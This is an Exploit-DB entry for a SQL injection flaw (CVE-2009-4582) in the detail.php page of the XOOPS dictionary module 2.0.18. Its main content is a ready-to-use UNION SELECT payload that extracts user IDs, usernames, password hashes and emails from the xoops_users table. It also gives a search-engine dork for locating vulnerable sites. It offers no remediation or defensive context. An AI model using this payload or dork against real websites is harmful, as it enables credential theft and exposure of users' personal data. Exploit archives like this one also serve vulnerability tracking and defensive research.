XOOPS Module dictionary 2.0.18 detail.php SQL Injection Vulnerability

2009-12-30T00:00:00
ID EDB-ID:10807
Type exploitdb
Reporter Palyo34
Modified 2009-12-30T00:00:00

Description

XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability. CVE-2009-4582. Webapps exploit for php platform

                                        
                                            ##########################################
#
#  XOOPS Module dictionary 2.0.18 (detail.php) SQL Injection Vulnerability
#
#  XOOPS Version:  XOOPS 2.0.18 
#
#  http://www.xoops.org/modules/repository/
#
##########################################
#
# AUTHOR : Palyo34
#
# HOME : http://www.1923turk.biz
#
#
###########################################
#
# DORK  : allinurl: "modules/dictionary/detail.php?id"
#
###########################################
#   
#   EXPLOIT :
#
#     modules/dictionary/detail.php?id=-885+union+select+1,2,3,concat_ws(0x3a,uid,uname,pass,email),5,6+from+xoops_users--
#
##############################################